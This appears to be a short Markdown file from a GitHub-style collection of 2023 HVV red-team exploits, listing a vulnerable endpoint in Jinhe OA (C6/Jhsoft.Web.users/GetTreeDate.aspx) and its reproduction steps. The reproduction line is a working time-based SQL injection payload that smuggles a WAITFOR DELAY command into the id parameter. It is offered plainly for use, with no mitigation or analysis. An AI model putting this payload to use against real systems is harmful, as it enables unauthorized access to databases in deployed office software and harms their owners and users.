2023Hvv/金和OA 未授权.md

7 lines
221 B
Markdown
Raw Normal View History

2023-08-13 14:27:10 +08:00
1. 漏洞链接
http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1
1. 复现步骤
http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=1